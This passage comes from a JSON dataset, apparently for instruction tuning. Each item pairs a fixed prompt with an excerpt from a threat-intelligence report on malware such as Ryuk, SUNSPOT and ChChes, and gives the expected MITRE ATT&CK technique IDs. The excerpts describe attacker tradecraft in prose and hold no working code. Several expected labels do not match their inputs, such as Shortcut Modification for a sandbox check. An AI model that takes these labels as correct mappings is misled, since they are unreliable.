ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware displays fake forms on top of the banking sites and intercepts credentials from the victims. It can also display a fake Windows Update whenever there is nefarious activity in the background, as seen in Figure 23", + "output": "- T1056.002: Input Capture - GUI Input Capture" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL.The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "During one investigation, APT32 was observed using a privilege escalation exploit (CVE-2016-7255) masquerading as a Windows hotfix. In another investigation, APT32 compromised the McAfee ePO infrastructure to distribute their malware as a software deployment task in which all systems pulled the payload from the ePO server using the proprietary SPIPE protocol. APT32 also used hidden or non-printing characters to help visually camouflage their malware on a system. For example, APT32 installed one backdoor as a persistent service with a legitimate service name that had a Unicode no-break space character appended to it. Another backdoor used an otherwise legitimate DLL filename padded with a non-printing OS command control code", + "output": "- T1036.004: Masquerading - Masquerade Task or Service\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers also ran the nmap utility on the router VM and scanned ports on systems within the restricted segment of the enterprise network. On September 27, the attackers started removing all traces of their activity from the router, using the logrotate utility to set up automatic deletion of log files", + "output": "- T1070.003: Indicator Removal - Clear Command History\n- T1046: Network Service Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target\u2019s network. The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment. TEMP.Veles\u2019 lateral movement activities used a publicly-available PowerShell-based tool, WMImplant. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection. Four files tested in 2014 are based on the open-source project, cryptcat. Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates. One of these files was deployed in a TEMP.Veles target\u2019s network. On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection", + "output": "- T1027.005: Obfuscated Files or Information - Indicator Removal from Tools" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Another interesting discovery was a tool that was used during attacks to make queries to Active Directory using LDAP. This tool is able to dump detailed information about computers and usernames listed in Active Directory, and is tailored for a specific victim\u2019s domain", + "output": "- T1018: Remote System Discovery\n- T1087.002: Account Discovery - Domain Account" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attackers then created scheduled tasks that would launch the ransomware with names based on variants of Windows Update Security or Windows Update Security Patches", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In what appears to be a first on the cyber-espionage scene, a nation-state-backed hacking group has used a Google Chrome extension to infect victims and steal passwords and cookies from their browsers", + "output": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- T1176: Browser Extensions" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The shellcode loaded by the macro contains an encrypted DLL which is decrypted at runtime and then manually mapped into memory by the shellcode. After mapping the DLL, the shellcode jumps to the entry point of that DLL. The shellcode uses some kind of custom hashing method to resolve the APIs. We used hollows_hunter to dump the DLL and reconstruct the IAT once it is fully mapped into memory", + "output": "- T1620: Reflective Code Loading\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Based on our technical analysis, telemetry, and data from submissions, we can assert with high confidence that this is the work of the Hidden Cobra group. These initial findings appear to be the first stage of Operation GhostSecret. For more on the global aspect of this threat, see \u201cGlobal Malware Campaign Pilfers Data from Critical Infrastructure of Entertainment, Finance, Health Care, and Other Industries", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It\u2019s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not", + "output": "- T1553.002: Subvert Trust Controls - Code Signing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attacker\u2019s choice of IP addresses was also optimized to evade detection. The attacker primarily used only IP addresses originating from the same country as the victim, leveraging Virtual Private Servers", + "output": "- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SUNSPOT is StellarParticle\u2019s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product. SUNSPOT monitors running processes for those involved in compilation of the Orion product and replaces one of the source files to include the SUNBURST backdoor code. Several safeguards were added to SUNSPOT to avoid the Orion builds from failing, potentially alerting developers to the adversary\u2019s presence", + "output": "- T1195.002: Supply Chain Compromise - Compromise Software Supply Chain" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The modules are signed by an invalid digital certificates listed as \u201cTencent Technology (Shenzhen) Company Limited\u201d with serial numbers, copied from real Tencent certificates", + "output": "- T1036.001: Masquerading - Invalid Code Signature" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Capable of stealing documents sent to the printer queue. Steals written CD images. Capable of stealing files previously seen on removable drives once they are available again. Steals Internet Explorer, Netscape Navigator, FireFox and RealNetworks cookies. If deleted from Frontend file or related registry values, it will reappear after reboot with a new name and startup type", + "output": "- T1025: Data from Removable Media" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Recall that when the malicious code is executed, it invokes the extract_ei function on its own binary image, to check if the file is infected. If so, it opens itself, and reads the trailer to get the offset of where the file\u2019s original bytes are located. It then writes these bytes out to a new file named: .<orginalfilename>1. This file is then set executable (via chmod) and executed (via execl", + "output": "- T1554: Compromise Host Software Binary" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Next, the shellcode iterates through the PEB\u2019s loader module list looking for the base address of Kernel32.dll. This is typical of shellcode, as the Kernel32.dll base address is necessary to resolve any dependency files required by the shellcode to run. With this address, the shellcode loads its dependency modules and resolves any necessary Windows Application Programming Interface (API) calls using standard shellcode API hashing. The following modules are loaded", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "NOBELIUM, with existing administrative permissions, was observed to drop a malicious loader named version.dll in the %WinDir%\\ADFS\\ folder where the AD FS service executable Microsoft.IdentityServer.ServiceHost.exe is located. Once the system or the AD FS service is restarted, Microsoft.IdentityServer.ServiceHost.exe loads mscoree.dll, which in turn loads mscoreei.dll. As mentioned above, mscoreei.dll has a delay load import named version.dll", + "output": "- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In recent BitPaymer IR engagements, Falcon Intelligence linked the initial infection vector to fake updates for a FlashPlayer plugin and the Chrome web browser. These fake updates are served via legitimate websites that have been compromised, and use social engineering to trick users into downloading and running a malicious executable. These fake update campaigns appear to be a pay-per-install service that is simply used by INDRIK SPIDER to deliver its malware, as other malware has also been delivered via the same campaigns", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location\n- T1584.004: Compromise Infrastructure - Server" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"One of the reconnaissance commands was to run a modified nbtscan tool (\"\"NetBIOS nameserver scanner\"\") to identify available NetBIOS name servers locally or over the network. Nbtscan has been used by APT10 in Operation Cloud Hopper to search for services of interest across the IT estate and footprint endpoints of interest. It is also capable of identifying system information\"", + "output": "- T1016: System Network Configuration Discovery\n- T1018: Remote System Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The attacker used a temporary file replacement technique to remotely execute utilities: they replaced a legitimate utility with theirs, executed their payload, and then restored the legitimate original file. They similarly manipulated scheduled tasks by updating an existing legitimate task to execute their tools and then returning the scheduled task to its original configuration. They routinely removed their tools, including removing backdoors once legitimate remote access was achieved", + "output": "- T1070: Indicator Removal\n- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee\u2019s system, they gained access to the e-commerce company's internal network. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. Based on Suckfly scanning for common ports, it\u2019s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers\u2019 final step was to exfiltrate data off the victim\u2019s network and onto Suckfly\u2019s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In April, security researchers in the Microsoft Threat Intelligence Center discovered infrastructure of\u00a0a known adversary communicating to several external devices. Further research uncovered attempts by the actor to compromise popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. The investigation uncovered that an actor had used these devices to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer\u2019s passwords and in the third instance the latest security update had not been applied to the device", + "output": "- T1078: Valid Accounts" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a \u201cfile://\u201d connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. Note: a file transfer is not necessary for a loss of credential information. Symantec\u2019s report associates this behavior to the Dragonfly threat actors in this campaign. 1](link is external", + "output": "- T1187: Forced Authentication" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The logging functions are hooked so that whenever the backdoor is used, nothing gets sent to the logging facility, leaving no trace of the backdoor in the log files on disk. If the backdoor is not in use, logging will behave normally and function calls will get redirected to the original function implementation", + "output": "- T1562.006: Impair Defenses - Indicator Blocking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The output of the downloaded batch file is saved to \u201c%PUBLIC%\\Libraries\\tp\\<batch filename>.txt\u201d. The script will then upload the output of this batch file by including the data in a sequence of DNS queries. The exfiltrates the output of the batch script by splitting up the data within the text file into chunks up to 23 bytes and sends the data within a series of DNS queries that have the following structure", + "output": "- T1030: Data Transfer Size Limits" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ryuk does not encrypt files from within its own process memory space, but injects into a remote process. Before injecting into a remote process, Ryuk attempts to adjust its token privileges to have the SeDebugPrivilege. Before injecting into a remote process, Ryuk also calls CreateToolhelp32Snapshot to enumerate all running processes. If a process is found that is not named csrss.exe, explorer.exe, lsaas.exe, or is running under NT AUTHORITY system account, Ryuk will inject itself into this single process. By ensuring that the process is not running under NT AUTHORITY, the developers are assuming the process is not running under another account and therefore can be written to. Ryuk uses a combination of VirtualAlloc, WriteProcessMemory and CreateRemoteThread to inject itself into the remote process", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Next, the third-stage DLL will load the \"\"Waqybg\"\" resource into memory. As the resource is stored in reverse byte order, the third-stage DLL will restore it by reversing the bytes and then proceed to decompress it. The decompressed data is the fourth stage wiper payload. After decompressing the data, the third-stage DLL copies a legitimate Windows utility \"\"InstallUtil.exe\"\" into the %TEMP% directory, creates a suspended process with it and injects the fourth-stage wiper into the process. Finally, it resumes the process and transfers the execution flow to the fourth-stage wiper. Creates InstallUtil.exe process\"", + "output": "- T1055: Process Injection" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. This technique takes advantage of the fact that Windows does not require an application to provide a specific path for a DLL that it wishes to load. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group leverages search order hijacking to assure that its malicious DLLs will be executed. Targeting security applications could allow the attackers to gain higher privileges for the malware, since the vendor\u2019s component may be run with elevated privileges", + "output": "- T1036.005: Masquerading - Match Legitimate Name or Location" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware\u2019s next action is to check if the execute privilege is SYSTEM. When the execute privilege is SYSTEM, the malware will get the process \u201cExplorer.exe\u201d, get the token of the user that launched the process and impersonate it. It is a downgrade from SYSTEM to another user with less privileges to avoid affecting the desktop of the SYSTEM user later", + "output": "- T1134.001: Access Token Manipulation - Token Impersonation/Theft" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Currently LockerGoga does not support any worm-like capabilities that would allow it to self-propagate by infecting additional hosts on a target network. We have observed LockerGoga moving around a network via the server message block (SMB) protocol, which indicates the actors simply manually copy files from computer to computer", + "output": "- T1570: Lateral Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Finally, command line tried to execute (iex is an alias for Invoke-Expression) the code downloaded from the IP address 104[.]168[.]237[.]21. Threat actors abused sslip.io for connection to C&C - a service that provides free IP to domain mapping to make SSL certificate generation easier for traffic encryption. While this service is legitimate and widely used, the malware abused it in an attempt at evading detection when connecting to C&C servers", + "output": "- T1102: Web Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "If the payload determines it is not running in a sandbox, it will attempt to install itself to the system to persistently execute", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. This is typically represented as: (A * B) + C \u2013 common values might be 200.2.43.X, which would result in communication on port 443. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments", + "output": "- T1568.003: Dynamic Resolution - DNS Calculation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some versions of the Orz backdoor have 32- and 64-bit embedded DLLs, stored internally as base64 strings. Their purpose is to simply run another binary. These are used as loaders for future executable payloads, using the well-known process hollowing technique. To use the MockDll, the backdoor creates a configuration .ini file like that shown in Figure 14", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of 